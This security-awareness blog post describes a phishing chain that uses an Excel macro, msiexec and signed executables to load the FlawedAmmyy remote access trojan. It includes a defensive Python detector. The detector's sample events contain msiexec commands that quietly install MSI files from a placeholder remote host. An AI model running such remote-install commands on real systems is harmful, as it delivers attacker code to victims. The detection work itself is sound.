A new set of tweets from Microsoft Security Intelligence walks through an attack that chains together a number of built-in Windows tools to infect machines with the notorious FlawedAmmyy malware.
Many attackers attempt to “live off the land”, leveraging executables, tools, and scripting languages that are built into the Windows operating system as a way to avoid detection. This latest attack documented by Microsoft does exactly that with the intent of installing a remote access trojan (RAT) that gives an attacker complete control over the infected endpoint.
Here’s how it works:
- The potential victim receives an email written in Korean containing an Excel spreadsheet as an attachment.
- When opened, the Excel file runs a macro that calls msiexec.exe
- msiexec.exe downloads a Microsoft Installer (MSI) file to be installed
- The MSI file contains a digitally signed executable (so it must be safe, right?) that decrypts and loads a second executable directly into memory
- The second executable downloads another digitally signed file, wsus.exe
- This file runs and loads the final payload – the FlawedAmmyy RAT – into memory
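The first step of that chain a defender can actually see in endpoint telemetry is Excel handing off to msiexec.exe with a remote package to install. As an added illustration (example code, not part of Microsoft's report or of this post), here is a small Python detector run over constructed process-creation events; the paths, URLs and event fields are placeholders, not real telemetry.

```python
"""Added example: flag process-creation events where an Office application
spawns msiexec.exe, or where msiexec.exe quietly installs from a remote URL."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_SOURCE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
QUIET_FLAG = re.compile(r"(?:^|\s)[/-](?:q[nb]?|quiet)\b", re.IGNORECASE)

@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: ProcessEvent) -> Optional[str]:
    """Return a finding label for the event, or None if nothing stands out."""
    if basename(event.image) != "msiexec.exe":
        return None
    remote = bool(REMOTE_SOURCE.search(event.command_line))
    from_office = basename(event.parent_image) in OFFICE_APPS
    if from_office and remote:
        return "office-spawned msiexec fetching remote MSI"
    if from_office:
        return "office-spawned msiexec"
    if remote and QUIET_FLAG.search(event.command_line):
        return "quiet msiexec install from remote URL"
    return None

def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Run classify() over a batch and return (index, label) for each hit."""
    return [(i, label) for i, e in enumerate(events) if (label := classify(e))]

# Constructed sample events; example.invalid is a placeholder domain.
MSIEXEC = r"C:\Windows\System32\msiexec.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 MSIEXEC, r"msiexec.exe /i http://example.invalid/update.msi /q"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 MSIEXEC, r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"),
    ProcessEvent(r"C:\Windows\System32\services.exe", MSIEXEC, r"msiexec.exe /V"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 MSIEXEC, r"msiexec /i https://example.invalid/pkg.msi /qn"),
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

The second sample (Explorer launching a local MSI) is the everyday benign case the rules deliberately leave alone; tune OFFICE_APPS and the quiet-flag rule to your environment's baseline before alerting on them.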
This long sequence of steps is what lets the attackers avoid detection. Keep in mind, though, that all the user sees is opening the email and clicking the attachment – nothing more. THIS is why phishing is so successful: attackers automate every malicious part of the attack and only need an unwitting user to start the process.
Users who have gone through Security Awareness Training can easily spot the red flags in this type of attack; rather than giving in to curiosity, they err on the side of caution and treat the email as malicious. If you’re unsure whether your users would fall for this scam or rise above it, consider enrolling them in continual Security Awareness Training.